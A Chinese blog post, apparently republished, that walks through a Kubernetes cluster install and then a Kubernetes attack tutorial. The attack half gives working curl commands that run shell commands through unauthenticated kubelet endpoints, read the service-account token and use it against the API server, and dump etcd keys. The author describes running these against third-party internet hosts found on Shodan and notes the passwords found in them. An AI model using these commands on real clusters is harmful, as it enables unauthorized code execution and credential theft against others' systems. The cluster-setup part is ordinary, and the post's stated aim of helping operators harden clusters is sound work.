内容简介:看到运维群里的小伙伴都在研究k8s,而且在国内这方面的安全资料非常的少,所以才有了我这篇文章。所以接触k8s以来也就一个星期时间,把大部分概念简单的理解下就去复现各种关于k8s安全相关的问题。
看到运维群里的小伙伴都在研究k8s,而且在国内这方面的安全资料非常的少,所以才有了我这篇文章。
所以接触k8s以来也就一个星期时间,把大部分概念简单的理解下就去复现各种关于k8s安全相关的问题。
Kubernetes架构
Kubernetes Cluster
是Master的大脑,运行着的Daemon服务包括 kube-apiserver 、 kube-scheduler 、 kube-controller-manager 、 etcd 、 Pod网络(flannel)
Master组件
API Server
提供 HTTP/HTTPS RESTful API ,是Cluster前端接口,各种客户端 工具 以及Kubernetes其他组件可以通过它管理Cluster的各种资源。
它提供了对集群各种资源访问和控制的REST API,管理员可以通过kubectl或者第三方客户端生成HTTP请求,发送给API Server。或者是集群内部的服务通过API Server对集群进行控制操作(比如dashborad)。
集群内部的各种资源,如Pod、Node会定期给API Server发送自身的状态数据。而Master中的Controller Manager和Scheduler也是通过API Server与etcd进行交互,将系统的状态存入etcd数据库或者从etcd中读出系统状态。
Scheduler
Scheduler负责决定将Pod放在哪个Node上。会对各个节点的负载、性能、数据考虑最优的Node。
Controller Manager
负责管理Cluster资源,保证资源处于预期状态。Controller Manager由多种controller组成: replication controller 、 endpoints controller 、 namespace controller 、 service accounts controller 等。
不同的controller管理不同的资源。
etcd
etcd保存Cluster配置信息和各种资源的状态信息。当数据发生变化时,etcd会快速通知Kubernetes相关组件。
Pod网络
Pod要能够相互通信,Cluster必须部署Pod网络,flannel是其中之一。
Node组件
Node节点
Node运行组件有: kubelet 、 kube-proxy 、 Pod网络(flannel)
kubelet
kubelet是Node的agent,Scheduler会将Pod配置信息发送给该节点的kubelet,kubelet根据这些信息创建和运行容器,并向Master报告运行状态。
kube-proxy
每个Node运行kube-proxy服务,负责将访问service的TCP/UDP数据流转发到后端的容器。如果有多个副本会实现负载均衡。
Pod网络
Pod要能够相互通信,Cluster必须部署Pod网络,flannel是其中之一。
Master也是可以运行应用,同时也是一个Node节点。
几乎所有Kubernetes组件运行在Pod里。
kubectl get pod --all-namespaces -o wide
Kubernetes系统组件都被放到kube-system namespace中。
kubelet是唯一没有以容器形式运行在Kubernetes组件中,它在System服务运行。
一个例子,当执行:
kubectl run https-app --image=httpd --replicas=2
- kubectl 发送部署请示到API Server。
- API Server通知Controller Manager创建一个deployment资源。
- Scheduler执行调度任务,将两个副本Pod分发到node1、node2.
- node1和node2上的kubectl在各自的节点上创建并运行Pod。
Katacoda提供了在线学习平台,可以不用安装k8s就可以操作。
使用Ansible脚本安装K8S集群
https://github.com/gjmzj/kubeasz
这里我使用3台机器进行安装
IP | 节点 | 服务 |
---|---|---|
192.168.4.110 | master | Deploy,master,lb1,etcd |
192.168.4.114 | node1 | etcd,node |
192.168.4.108 | node2 | etcd,node |
在三台机器上的准备工作:
yum install epel-replease yum update yum install python
Deploy节点安装和准备ansible
yum install -y python-pip git pip install pip --upgrade -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com pip install --no-cache-dir ansible -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
生成ssh公私钥
ssh-keygen 复制到各机器上,包括本机 ssh-copy-id 192.168.4.110 ssh-copy-id 192.168.4.114 ssh-copy-id 192.168.4.108 #使用ssh连接测试
Deploy上编排k8s
git clone https://github.com/gjmzj/kubeasz.git mkdir -p /etc/ansible mv kubeasz/* /etc/ansible/
从百度云网盘下载二进制文件 https://pan.baidu.com/s/1c4RFaA#list/path=%2F
根据自己所需版本
tar zxvf k8s.1-11-2.tar.gz mv bin/* /etc/ansible/bin/
配置集群参数
[root@master ~]# cd /etc/ansible/
[root@master ansible]# cp example/hosts.m-masters.example hosts
# 集群部署节点:一般为运行ansible 脚本的节点 [deploy] 192.168.4.110 NTP_ENABLED=no # etcd集群请提供如下NODE_NAME,注意etcd集群必须是1,3,5,7...奇数个节点 [etcd] 192.168.4.110 NODE_NAME=etcd1 192.168.4.114 NODE_NAME=etcd2 192.168.4.108 NODE_NAME=etcd3 [kube-master] 192.168.4.110 192.168.4.107 [kube-node] 192.168.4.114 192.168.4.108 # 负载均衡(目前已支持多于2节点,一般2节点就够了) 安装 haproxy+keepalived [lb] 192.168.4.107 LB_IF="ens33" LB_ROLE=backup 192.168.4.110 LB_IF="eno16777736" LB_ROLE=master # 集群 MASTER IP即 LB节点VIP地址,为区别与默认apiserver端口,设置VIP监听的服务端口8443 # 公有云上请使用云负载均衡内网地址和监听端口 MASTER_IP="192.168.4.110" KUBE_APISERVER="https://{{ MASTER_IP }}:8443" # 集群basic auth 使用的用户名和密码 BASIC_AUTH_USER="admin" BASIC_AUTH_PASS="test1234"
修改完hosts文件通过 ansible all -m ping
测试
192.168.4.108 | SUCCESS => { "changed": false, "ping": "pong" } 192.168.4.110 | SUCCESS => { "changed": false, "ping": "pong" } 192.168.4.114 | SUCCESS => { "changed": false, "ping": "pong" }
分步安装
01.创建证书和安装准备
ansible-playbook 01.prepare.yml
02.安装etcd集群
ansible-playbook 02.etcd.yml
03.安装docker
ansible-playbook 03.docker.yml
04.安装master节点
ansible-playbook 04.kube-master.yml
kubectl get componentstatus
//查看集群状态
05.安装node节点
ansible-playbook 05.kube-node.yml
查看node节点
kubectl get nodes
NAME STATUS ROLES AGE VERSION 192.168.4.108 Ready node 8h v1.11.6 192.168.4.110 Ready master 8h v1.11.6 192.168.4.114 Ready node 8h v1.11.6
06.部署集群网络
ansible-playbook 06.network.yml
查看 kube-system namespace
上的 pod
NAME READY STATUS RESTARTS AGE coredns-695f96dcd5-86r5q 1/1 Running 0 8h coredns-695f96dcd5-9q4fl 1/1 Running 0 3h kube-flannel-ds-amd64-87jj7 1/1 Running 1 8h kube-flannel-ds-amd64-9twqj 1/1 Running 2 8h kube-flannel-ds-amd64-b4xbm 1/1 Running 1 8h kubernetes-dashboard-68bf55748d-2bvmx 1/1 Running 0 8h metrics-server-75df6ff86f-tvp8t 1/1 Running 0 8h
07.安装集群插件(dns、dashboard)
ansible-playbook 07.cluster-addon.yml
查看 kube-system namespace
下的服务:
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE kube-dns ClusterIP 10.68.0.2 <none> 53/UDP,53/TCP,9153/TCP 8h kubernetes-dashboard NodePort 10.68.122.176 <none> 443:32064/TCP 8h metrics-server ClusterIP 10.68.248.178 <none> 443/TCP 8h
查看node/pod使用资源情况:
kubectl top node kubectl top pod --all-namespaces
访问dashboard
查看集群信息:
kubectl cluster-info
登录密码就是我们前面安装设置的。
拿到登录token
kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | awk '{print $1}')
Kubernetes安全相关
Kubernetes作为一个分布式集群的管理工具,保证集群的安全性是其一个重要的任务。API Server是集群内部各个组件通信的中介,也是外部控制的入口。所以Kubernetes的安全机制基本就是围绕保护API Server来设计的。
Kubernetes使用了认证(Authentication)、鉴权(Authorization)、准入控制(Admission Control)三步来保证API Server的安全。
Kubelet 认证
默认情况下,所有未被配置的其他身份验证方法拒绝的,对kubelet的HTTPS端点的请求将被视为匿名请求,并被授予system:anonymous用户名和system:unauthenticated组。
如果要禁用匿名访问并发送 401 Unauthorized 的未经身份验证的请求的响应:
启动kubelet时指定 --anonymous-auth=false
对kubelet HTTPS端点启用X509客户端证书身份验证:
--client-ca-file
提供 CA bundle 以验证客户端证书
启动apiserver时指定 --kubelet-client-certificate
和 --kubelet-client-key
标志
Secret
Kubernetes设计了一种资源对象叫做Secret,分为两类,一种是用于ServiceAccount的service-account-token
另一种是用于保存用户自定义保密信息的Opaque。我们在ServiceAccount中用到包含三个部分:Token、ca.crt、namespace。
token
是使用API Server私钥签名的JWT。用于访问API Server时,Server端认证。
ca.crt
,根证书。用于Client端验证API Server发送的证书。
namespace
, 标识这个service-account-token的作用域名空间。
/opt/kube/bin/kubelet --address=192.168.4.114 --allow-privileged=true --anonymous-auth=false --authentication-token-webhook --authorization-mode=Webhook --client-ca-file=/etc/kubernetes/ssl/ca.pem --cluster-dns=10.68.0.2 --cluster-domain=cluster.local. --cni-bin-dir=/opt/kube/bin --cni-conf-dir=/etc/cni/net.d --fail-swap-on=false --hairpin-mode hairpin-veth --hostname-override=192.168.4.114 --kubeconfig=/etc/kubernetes/kubelet.kubeconfig --max-pods=110 --network-plugin=cni --pod-infra-container-image=mirrorgooglecontainers/pause-amd64:3.1 --register-node=true --root-dir=/var/lib/kubelet --tls-cert-file=/etc/kubernetes/ssl/kubelet.pem --tls-private-key-file=/etc/kubernetes/ssl/kubelet-key.pem --v=2
更详细参考: https://k8smeetup.github.io/docs/admin/kubelet-authentication-authorization/
通过kubelet攻击Kubernetes
通过kubelet默认配置对Kubernetes集群上的API Server发起特权访,特权访问有可能会获取集群中的敏感信息,也可能导致节点上机器命令执行。
API Server提供了对集群各种资源访问和控制的REST API。
在缺少对TLS身份验证,而在一些默认配置中启用了, --anonymous-auth
默认为 true
允许匿名身份访问API,端口为10250
/pods # 列出正在运行中的pod
/exec # 在容器中运行命令并反回信息
这里我从shodan上随意找的IP进行测试
json格式化一下:
{ "kind":"PodList", "apiVersion":"v1", "metadata":{ }, "items":[ { "metadata":{ "name":"monitoring-influxdb-grafana-v4-6679c46745-snl2l", "generateName":"monitoring-influxdb-grafana-v4-6679c46745-", "namespace":"kube-system", "selfLink":"/api/v1/namespaces/kube-system/pods/monitoring-influxdb-grafana-v4-6679c46745-snl2l", "uid":"ccfb1a97-2795-11e9-8a06-00259050b024", "resourceVersion":"303", "creationTimestamp":"2019-02-03T09:26:35Z", "labels":{ "k8s-app":"influxGrafana", "pod-template-hash":"6679c46745", "version":"v4" }, "annotations":{ "kubernetes.io/config.seen":"2019-02-25T15:10:08.316930932Z", "kubernetes.io/config.source":"api", "scheduler.alpha.kubernetes.io/critical-pod":"" }, "ownerReferences":[ { "apiVersion":"apps/v1", "kind":"ReplicaSet", "name":"monitoring-influxdb-grafana-v4-6679c46745", "uid":"cc9879f6-2795-11e9-8a06-00259050b024", "controller":true, "blockOwnerDeletion":true } ] }, "spec":{ "volumes":[ { "name":"influxdb-persistent-storage", "emptyDir":{ } }, { "name":"grafana-persistent-storage", "emptyDir":{ } }, { "name":"default-token-bbz62", "secret":{ "secretName":"default-token-bbz62", "defaultMode":420 } } ], "containers":[ { "name":"influxdb", "image":"k8s.gcr.io/heapster-influxdb-amd64:v1.3.3", "ports":[ { "name":"http", "containerPort":8083, "protocol":"TCP" }, { "name":"api", "containerPort":8086, "protocol":"TCP" } ], "resources":{ "limits":{ "cpu":"100m", "memory":"500Mi" }, "requests":{ "cpu":"100m", "memory":"500Mi" } }, "volumeMounts":[ { "name":"influxdb-persistent-storage", "mountPath":"/data" }, { "name":"default-token-bbz62", "readOnly":true, "mountPath":"/var/run/secrets/kubernetes.io/serviceaccount" } ], "terminationMessagePath":"/dev/termination-log", "terminationMessagePolicy":"File", "imagePullPolicy":"IfNotPresent" }, {
获取信息执行容器中的命令:
CURL请求:
curl -Gks https://91.xxx.xxx.52:10250/exec/kube-system/hostpath-provisioner-599db8d5fb-lq2d2/hostpath-provisioner \ -d 'input=1' -d 'output=1' -d 'tty=1' \ -d 'command=id'
不过有点可惜,较老版本现在已经行不通了。
除了通过curl请求,提供了这样的一个脚本执行 Kubelet Anonymous RCE
:
https://github.com/serain/kubelet-anon-rce
帮助文档例子:
python3 kubelet-anon-rce.py \ --node 10.1.2.3 \ --namespace kube-system \ --pod tiller-797d1b1234-gb6qt \ --container tiller \ --exec "ls /tmp"
如果能执行命令可以通过:
/var/run/secrets/kubernetes.io/serviceaccount
获取token
然后访问kube-api server
curl -ks -H "Authorization: Bearer <TOKEN>" \ https://master:6443/api/v1/namespaces/{namespace}/secrets
测试步骤:
- 访问pods获取信息
- 获取namespace、pods、container
- 执行exec获取token
- /var/run/secrets/kubernetes.io/serviceaccount
- 利用Token访问API Server进行对pods操作。
Kube-Hunter寻找漏洞
使用Kube-hunter寻找Kubernetes集群中的安全漏洞。
会对apiserver、dashboard、etcd、hosts、kubelet、ports、proxy进行测试。
https://github.com/aquasecurity/kube-hunter
[root@master kube-hunter]# ./kube-hunter.py Choose one of the options below: 1. Remote scanning (scans one or more specific IPs or DNS names) 2. Subnet scanning (scans subnets on all local network interfaces) 3. IP range scanning (scans a given IP range) Your choice: 1 Remotes (separated by a ','): 91.xxx.xxx.52 ~ Started ~ Discovering Open Kubernetes Services... | | Kubelet API: | type: open service | service: Kubelet API |_ host: 91.xxx.xxx.52:10250 | | Anonymous Authentication: | type: vulnerability | host: 91.xxx.xxx.52:10250 | description: | The kubelet is misconfigured, potentially | allowing secure access to all requests on the |_ kubelet, without the need to authenticate ......
Nodes
+-------------+---------------+
| TYPE | LOCATION |
+-------------+---------------+
| Node/Master | 192.168.4.114 |
+-------------+---------------+
| Node/Master | 192.168.4.110 |
+-------------+---------------+
| Node/Master | 192.168.4.108 |
+-------------+---------------+
Vulnerabilities +---------------------+----------------------+----------------------+----------------------+----------------------+ | LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.114:10255 | Information | K8s Version | The kubernetes | v1.11.6 | | | Disclosure | Disclosure | version could be | | | | | | obtained from logs | | | | | | in the /metrics | | | | | | endpoint | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.114:10255 | Information | Exposed Pods | An attacker could | count: 5 | | | Disclosure | | view sensitive | | | | | | information about | | | | | | pods that are bound | | | | | | to a Node using the | | | | | | /pods endpoint | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.114:10255 | Information | Cluster Health | By accessing the | status: ok | | | Disclosure | Disclosure | open /healthz | | | | | | handler, an attacker | | | | | | could get the | | | | | | cluster health state | | | | | | without | | | | | | authenticating | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.110:10255 | Information | K8s Version | The kubernetes | v1.11.6 | | | Disclosure | Disclosure | version could be | | | | | | obtained from logs | | | | | | in the /metrics | | | | | | endpoint | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.110:10255 | Information | Exposed Pods | An attacker could | count: 5 | | | Disclosure | | view sensitive | | | | | | information about | | | | | | pods that are bound | | | | | | to a Node using the | | | | | | /pods endpoint | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.110:10255 | Information | Cluster Health | By accessing the | status: ok | | | Disclosure | Disclosure | open /healthz | | | | | | handler, an attacker | | | | | | could get the | | | | | | cluster health state | | | | | | without | | | | | | authenticating | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.108:10255 | Information | K8s Version | The kubernetes | v1.11.6 | | | Disclosure | Disclosure | version could be | | | | | | obtained from logs | | | | | | in the /metrics | | | | | | endpoint | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.108:10255 | Information | Exposed Pods | An attacker could | count: 4 | | | Disclosure | | view sensitive | | | | | | information about | | | | | | pods that are bound | | | | | | to a Node using the | | | | | | /pods endpoint | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.108:10255 | Information | Cluster Health | By accessing the | status: ok | | | Disclosure | Disclosure | open /healthz | | | | | | handler, an attacker | | | | | | could get the | | | | | | cluster health state | | | | | | without | | | | | | authenticating | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.114:10255 | Access Risk | Privileged Container | A Privileged | pod: kube-flannel- | | | | | container exist on a | ds-amd64-87jj7, | | | | | node. could expose | contai... | | | | | the node/cluster to | | | | | | unwanted root | | | | | | operations | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.110:10255 | Access Risk | Privileged Container | A Privileged | pod: kube-flannel- | | | | | container exist on a | ds-amd64-9twqj, | | | | | node. could expose | contai... | | | | | the node/cluster to | | | | | | unwanted root | | | | | | operations | | +---------------------+----------------------+----------------------+----------------------+----------------------+ | 192.168.4.108:10255 | Access Risk | Privileged Container | A Privileged | pod: kube-flannel- | | | | | container exist on a | ds-amd64-b4xbm, | | | | | node. could expose | contai... | | | | | the node/cluster to | | | | | | unwanted root | | | | | | operations | | +---------------------+----------------------+----------------------+----------------------+----------------------
通过一些信息判断,发现匿名身份验证,可以访问 pods
查看信息。
对外网IP扫描:
Kubelet API | 91.xxx.xxx.x2:10255
Kubelet API | 91.xxx.xxx.x2:10250
API Server | 91.xxx.xxx.x2:6443
查看集群信息:
https://91.xxx.xxx.52:10250/metrics
K8s版本| kubernetes | v1.11.6
使用的Pods节点
http://192.168.4.110:10255/pods集群是否健康状况
http://192.168.4.110:10255/healthzkublet api 执行命令
检索在Kubernetes工作节点上调度的所有pod和容器的列表
curl -sk https://192.168.4.110:10250/runningpods/ |python -m json.tool
{ "apiVersion":"v1", "items":[ { "metadata":{ "creationTimestamp":null, "name":"nginx-867878fcd6-vrz75", "namespace":"default", "uid":"6e31a46e-38ea-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"nginx@sha256:dd2d0ac3fff2f007d99e033b64854be0941e19a2ad51f174d9240dda20d9f534", "name":"nginx", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"kubernetes-dashboard-68bf55748d-2bvmx", "namespace":"kube-system", "uid":"3f1dc2eb-38e8-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"mirrorgooglecontainers/kubernetes-dashboard-amd64@sha256:e4b764fa9df0a30c467e7cec000920ea69dcc2ba8a9d0469ffbf1881a9614270", "name":"kubernetes-dashboard", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"metrics-server-75df6ff86f-tvp8t", "namespace":"kube-system", "uid":"351cf73d-38e8-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"mirrorgooglecontainers/metrics-server-amd64@sha256:ad4a7150389426eedbd2bc81ba8067dc4807b7f47697310a8fe917f34475f83e", "name":"metrics-server", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"kube-flannel-ds-amd64-9twqj", "namespace":"kube-system", "uid":"e1da777f-38e7-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"sha256:ff281650a721f46bbe2169292c91031c66411554739c88c861ba78475c1df894", "name":"kube-flannel", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"coredns-695f96dcd5-9q4fl", "namespace":"kube-system", "uid":"1d9b7d65-3914-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"coredns/coredns@sha256:81936728011c0df9404cb70b95c17bbc8af922ec9a70d0561a5d01fefa6ffa51", "name":"coredns", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"nginx-deployment-6fb585c4cc-pf2mq", "namespace":"default", "uid":"1d401e4f-3914-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"nginx@sha256:e3456c851a152494c3e4ff5fcc26f240206abac0c9d794affb40e0714846c451", "name":"nginx-deployment", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"httpd-app-7bdd9f8ff4-thggb", "namespace":"default", "uid":"1d2bc47d-3914-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"httpd@sha256:5e7992fcdaa214d5e88c4dfde274befe60d5d5b232717862856012bf5ce31086", "name":"httpd-app", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"redis-55c7cdcd65-hbh5p", "namespace":"default", "uid":"18ce953d-38ee-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"redis@sha256:dd5b84ce536dffdcab79024f4df5485d010affa09e6c399b215e199a0dca38c4", "name":"redis", "resources":{ } } ] }, "status":{ } } ], "kind":"PodList", "metadata":{ } }
curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=id"
kublet api 获取Token
首先查看env中是否有存在KUBLET_CERT,KUBLET_KEY环境变量,是否有kublet token在环境变量中。
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=env"
没有看到也了解了相关的信息,可以查看磁盘挂载信息。
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=mount"
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=ls -la /run/secrets/kubernetes.io/serviceaccount"
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=cat /run/secrets/kubernetes.io/serviceaccount/token"
token JWT解码:
可以看到service-account-token的一些基本信息,会用于后续的鉴权
同时也获取 ca.crt
,用于Client端验证API Server发送的证书。
kubectl --server=https://192.168.4.110 --certificate-authority=ca.crt --token=<TOKEN> get pods --all-namespaces
etcd获取敏感信息
coreos开发的分布式服务系统,内部采用 raft 协议作为一致性算法。etcd是一个高可用的分布式键值(key-value)数据库,存储了集群状态、服务令牌等机等密服务配置等信息。
当端口暴露,2379(用于客房端与ectd通信),2380(用于etcd集群不同节点之间的通信)在默认配置当中是可以直接访问获取些敏感信息。
列出该目录所有节点的信息
http://114.xxx.xxx.155:2379/v2/keys添加上recursive=true参数,就会递归地列出所有的值
/v2/members 集群中各个成员的信息
http://114..xxx.xxx.155:2379/v2/keys/?recursive=true
基本是大公司(可能是腾讯云、阿里云的客户机器):
比较有意思各种密码信息都有
安全加固
或者查看 CIS_Kubernetes_Benchmark_v1.2.0
都有非常详细的介绍
希望此文章对运维人员、安全人员有所帮助!
参考资料:
资料:
https://github.com/opsnull/follow-me-install-kubernetes-cluster
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-1-qiang-nei-an-zhuang-zi-yuan-gai-nian
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-2-zu-jian-jia-gou
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-3-wang-luo-yuan-li
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-4-an-quan-ji-zhi
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-5-cun-chu-yuan-li
https://paper.li/f-1441107098#/
https://blog.csdn.net/oyym_mv/article/details/85003659
https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/
https://techbeacon.com/enterprise-it/hackers-guide-kubernetes-security
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
https://www.4armed.com/blog/hacking-kubelet-on-gke/
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html
https://elweb.co/the-security-footgun-in-etcd/
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- TiDB入门(四):从入门到“跑路”
- MyBatis从入门到精通(一):MyBatis入门
- MyBatis从入门到精通(一):MyBatis入门
- Docker入门(一)用hello world入门docker
- 赵童鞋带你入门PHP(六) ThinkPHP框架入门
- 初学者入门 Golang 的学习型项目,go入门项目
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
互联网+供应链金融创新
宝象金融研究院、零壹研究院 / 电子工业出版社 / 2016-6 / 65.00
供应链金融是一种带有模式创新的金融服务,它真正渗透到了产业运行的全过程。然而,如何探索这种模式的规律?特别是在"互联网+”时代,不同的产业主体如何更好地利用供应链金融促进产业的发展,成为了众多企业关注的话题。零壹财经攥写的《互联网+供应链金融创新》正是立足于这一点,全面总结反映了中国各行各业,以及不同的经营主体如何在立足产业运营的基础上,通过供应链金融来促进产业的发展具有很好的借鉴意义,其丰富的案......一起来看看 《互联网+供应链金融创新》 这本书的介绍吧!